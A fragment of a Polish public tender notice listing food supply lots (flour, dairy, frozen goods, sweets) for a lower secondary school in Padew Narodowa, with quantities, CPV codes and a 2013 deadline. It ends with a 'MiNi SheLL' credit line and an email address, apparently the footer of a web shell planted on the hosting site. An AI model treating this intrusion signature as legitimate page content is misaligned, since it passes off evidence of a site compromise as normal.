46	Pomidory w puszce całe, op. 5 l	szt	40	
47	Rosół wołowy 2200 g	szt. 	10	Winiary lub równoważne
48	Rosół warzywny 2200 g	szt. 	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.20.00-1, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mąki i artykułów mącznych dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Nazwa JM	Ilość	uwagi
1	2	3	4	5
1	Kasza manna, op. 500 g	kg	    60	
2	Kasza jęczmienna, op.1000 g	kg	  132	
3	Ryż biały długi, op. 1000 g	kg	   60	Piątnica lub równoważny
4	Ryż biały, op. 1 kg 	kg	60	Sanko lub równoważny
5	Makaron spagetti, op. 500g	kg	150	Lubella lub równoważne
6	Makaron świderki, op. 500g	kg	360	
7	Makaron nitka, op. 250g	szt.	   440	Czanecki lub równoważne
8	Makaron muszelka mała, op. 250 g	szt.	80	
9	Makaron ryżyk, op. 250 g	szt.	80	
10	Mąka pszenna, op. 1000g	szt. 	158	
11	Mąka ziemniaczana, op. 1000 g	szt.	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.13.00-6, 15.61.00.00-7, 15.61.21.00-2, 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa nabiału dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Nazwa JM	Ilość	uwagi
1	2	3	4	5
1	Śmietana 18%, op 400g	szt.	914	
2	Masło, op. 200g	szt.	2 260	
3	Ser biały półtłusty	kg	100	
4	Jajka	szt.	6 630	
5	Ser żółty - salami	kg	20	
6	Ser żółty - edamski 	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-0, 03.14.25.00-3, 15.53.00.00-2, 15.54.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa mrożonek dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                  Nazwa	Nazwa JM	Ilość	 uwagi
1	2	3	4	5
1	Paluszki rybne	kg	   200	
2	Pierogi ruskie, op. 2500 g	szt	400	SWISS-POL lub równoważne
3	Pierogi ruskie, op. 450 g	szt	2 500	
4	Kalafior mrożony, op. 500g	szt	60	
5	Mieszanka wielowarzywna siedmioskładnikowa, op. 2500g	szt	21	
6	Brukselka, op. 2000g	szt	11	
7	Fasolka szparagowa żółta, op. 2500 g	szt.	9	
8	Fasolka szparagowa zielona, op. 2500g	szt	16	
9	Brokuły mrożone, op. 2500 g	szt	22	
10	Filet z ryby sola SHP	kg	350	
11	Filet z dorsza SHP	kg	100	
12	Filet z ryby tilapia SHP	kg	250	

SHP - filet z minimalną glazurą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa słodyczy dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                  Nazwa	Nazwa JM	Ilość	 uwagi
 1	                    2                                                                                                                                                          	        3	     4	               5
1	Czekolada z orzechami, op. 100 g	szt. 	500	Alpen Gold lub równoważne
2	Czekolada mleczna, op. 100 g	szt	500	
3	Czekolada z orzechami, op. 200 g	szt	500	
4	Czekolada mleczna, op. 200 g	szt	500	
5	Czekolada z bakaliami, op. 200 g	szt	500	
6	Cukierki czekoladowe 	kg	5	Michaszki lub równoważne
7	Cukierki galaretka w czekoladzie	kg	5	Wedel lub równoważne
8	Cukierki mieszanka w czekoladzie	kg	20	Wedel lub równoważne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com